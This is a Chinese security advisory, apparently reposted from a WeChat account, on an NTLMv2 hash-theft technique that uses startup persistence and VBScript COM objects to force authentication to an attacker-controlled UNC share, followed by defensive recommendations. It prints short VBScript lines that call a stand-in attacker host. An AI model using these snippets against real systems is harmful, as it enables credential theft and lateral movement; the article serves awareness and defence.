2025年6月25日,安全研究人员监测黑客论坛发现,一种全新“无需编号CVE、高隐蔽性”的NTLMv2哈希窃取技术正被广泛传播和讨论。与传统“Pass-the-Hash”攻击不同,该手法充分利用Windows原生自动执行与COM组件调用机制,无需借助已知漏洞即可高效窃取目标主机的NTLMv2哈希。攻击者首先通过社会工程或钓鱼手段,将精心构造的VBScript/PowerShell脚本植入用户的启动项目录或Run注册表项,实现登录或开机后自动运行;随后,脚本在本地实例化Windows自带的Shell.Application、Scripting.FileSystemObject和MSXML2.XMLHTTP等COM对象,向攻击者控制的UNC共享路径(如 \attacker-servershare)发起无感知访问。Windows会在后台自动启动NTLMv2认证并将哈希凭证发送至远端服务器。攻击者在其服务器上运行Responder、ntlmrelayx等监听与中继工具,即可实时捕获并中继这些哈希,用于横向渗透、权限提升或离线破解。该技术无需零点击漏洞、无文件下载,只要脚本获得执行权限,即可在内网环境中快速传播与侵渗,严重威胁企业网络安全和数据完整性。
攻击原理与流程
-
脚本植入与自启动将脚本复制至Startup文件夹或写入Run注册表,确保系统登录时自动执行。(这一步骤很是关键,需要运用社会工程学)
![警惕:新型Windows NTLMv2哈希窃取技法曝光]( "警惕:新型Windows NTLMv2哈希窃取技法曝光")
-
组件实例化使用VBScript创建COM对象:
Set sh=CreateObject("Shell.Application")Set fso=CreateObject("Scripting.FileSystemObject")
Set http=CreateObject("MSXML2.XMLHTTP")
![警惕:新型Windows NTLMv2哈希窃取技法曝光]( "警惕:新型Windows NTLMv2哈希窃取技法曝光")
-
触发自动NTLM认证
sh.NameSpace "\attacker-servershare"
http.Open "GET","\attacker-serverping",False
http.Send
Windows无感知发起NTLMv2认证,凭证直达攻击服务器。
-
哈希捕获与利用攻击者运行Responder等工具,实时监听与中继NTLMv2哈希,实现Pass-the-Hash横向渗透。
![警惕:新型Windows NTLMv2哈希窃取技法曝光]( "警惕:新型Windows NTLMv2哈希窃取技法曝光")
![警惕:新型Windows NTLMv2哈希窃取技法曝光]( "警惕:新型Windows NTLMv2哈希窃取技法曝光")
防御建议
-
审计自启动路径:定期检查Startup文件夹及Run注册表;
-
限制COM滥用:通过组策略白名单管理Shell.Application、MSXML2.XMLHTTP等;
-
控制UNC访问:隔离或认证外部网络共享;
-
强化凭证安全:部署多因素认证、启用LAPS与NTLM审计;
-
流量监测:部署IDS/IPS规则(如Snort 64742/64743)拦截异常认证流量。
这种攻击技术充分说明,攻击者正利用Windows原生机制进行高隐蔽认证窃取,建议各组织立即加固启动项、COM组件及网络访问策略,严防内部网络安全威胁。
参考资源
1、https://ramp4u.io/threads/ntlmv2-hash-leak-via-com-auto-execution.3227/
原文始发于微信公众号(网空闲话plus):警惕:新型Windows NTLMv2哈希窃取技法曝光
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论